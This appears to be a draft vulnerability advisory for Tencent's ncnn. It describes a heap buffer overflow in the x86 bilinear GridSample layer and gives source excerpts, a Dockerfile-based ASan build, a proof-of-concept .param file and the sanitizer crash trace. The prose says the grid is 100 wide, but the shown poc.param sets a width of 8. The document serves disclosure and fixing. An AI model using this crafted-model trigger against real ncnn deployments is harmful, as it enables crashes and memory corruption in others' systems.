All advisories
Draft

Heap Buffer Overflow in x86 GridSample

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overflow in x86 GridSample

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gridsample_bilinear_compute_blob.h:118 in gridsample_2d_bilinear_compute_blob
Sanitizer verdict: heap-buffer-overflow

Summary

A crafted .param file can give the x86 bilinear GridSample path a grid tensor whose width carries the sample count, while the offset/weight workspace is sized from the output dimensions derived from the grid's height and channel counts. The compute helper then writes one six-float record per pair of grid values into a workspace sized for far fewer records, overflowing the heap allocation. The supplied PoC drives this through ncnnoptimize, which executes the layer during ModelWriter::shape_inference(); the same path runs during ordinary inference on any x86 build.

Detail

The untrusted fields are the dimensions of the second (grid) input blob and the GridSample parameters sample_type, padding_mode and permute_fusion. Nothing in GridSample_x86::forward() requires the grid width to be consistent with the output extents it computes from the grid's other dimensions.

For a 3-D input with permute_fusion == 0, the output width and height are taken from grid.h and grid.c, and the bilinear workspace is allocated with exactly outw * outh six-float records. The compute helper instead derives its iteration count from grid.w * grid.h and advances the workspace cursor by six floats per iteration:

// src/layer/x86/gridsample_x86.cpp:60
        outw = permute_fusion == 0 ? grid_p1.h : grid_p1.w;
        outh = permute_fusion == 0 ? grid_p1.c : grid_p1.h;
// src/layer/x86/gridsample_x86.cpp:69
            offset_value_blob.create(outw, outh, elemsize * 6, 6, opt.workspace_allocator);

// src/layer/x86/gridsample_bilinear_compute_blob.h:7
    const int grid_size = grid.w * grid.h;
// src/layer/x86/gridsample_bilinear_compute_blob.h:83
            for (; x < grid_size; x += 2)
// src/layer/x86/gridsample_bilinear_compute_blob.h:109
                int* offset_ptr = (int*)offset_value_ptr;
                float* value_ptr = offset_value_ptr + 4;
// src/layer/x86/gridsample_bilinear_compute_blob.h:117
                value_ptr[0] = sample_x - x0;
                value_ptr[1] = sample_y - y0;

                gridptr += 2;
                offset_value_ptr += 6;

The PoC supplies a 4 x 4 data blob and a grid shaped w=100, h=1, c=1, with sample_type=1 (bilinear), padding_mode=1, align_corner=0 and permute_fusion=0. That makes outw = grid.h = 1 and outh = grid.c = 1, so offset_value_blob holds a single six-float record — 24 bytes of payload, reported by ASan as a 92-byte region including the reference count and over-read padding.

grid_size is nevertheless 100 * 1 = 100, so the helper performs 50 iterations, each writing four offsets and two interpolation weights and advancing offset_value_ptr by six floats — 300 floats into space for six. The second record's value_ptr[1] = sample_y - y0; at line 118 is the first store past the end, which is where ASan reports the 4-byte write.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-x86-gridsample && cd ncnn-poc-heap-buffer-overflow-in-x86-gridsample

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'POC'
7767517
3 3
Input data 0 1 data 0=1 1=1 2=1
Input grid 0 1 grid 0=8 1=1 2=1
GridSample gs 2 1 data grid out
POC

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e00000025c at pc 0x626b90863a7c bp 0x7ffd801143c0 sp 0x7ffd801143b0
WRITE of size 4 at 0x50e00000025c thread T0
    #0 0x626b90863a7b in void ncnn::gridsample_2d_bilinear_compute_blob<(ncnn::GridSample::PaddingMode)1, false>(ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat&, int) /ncnn/src/layer/x86/gridsample_bilinear_compute_blob.h:118
    #1 0x626b9093b943 in ncnn::GridSample_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gridsample_x86_avx512.cpp:77
    #2 0x626b87c2370b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #3 0x626b87c0bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #4 0x626b87c6b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #5 0x626b87afd3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #6 0x626b87b7aeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #7 0x76d61cdf01c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x76d61cdf028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x626b87afa624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e00000025c is located 0 bytes after 92-byte region [0x50e000000200,0x50e00000025c)
allocated by thread T0 here:
    #0 0x76d61d469f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x626b87b8f68e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x626b87b8f68e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x626b87bce4b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
    #4 0x626b9093b75d in ncnn::GridSample_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gridsample_x86_avx512.cpp:69
    #5 0x626b87c2370b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #6 0x626b87c0bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #7 0x626b87c6b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #8 0x626b87afd3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #9 0x626b87b7aeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #10 0x76d61cdf01c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x76d61cdf028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x626b87afa624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/x86/gridsample_bilinear_compute_blob.h:118 in void ncnn::gridsample_2d_bilinear_compute_blob<(ncnn::GridSample::PaddingMode)1, false>(ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat&, int)

Credit

Zheng Yu @ DepthFirst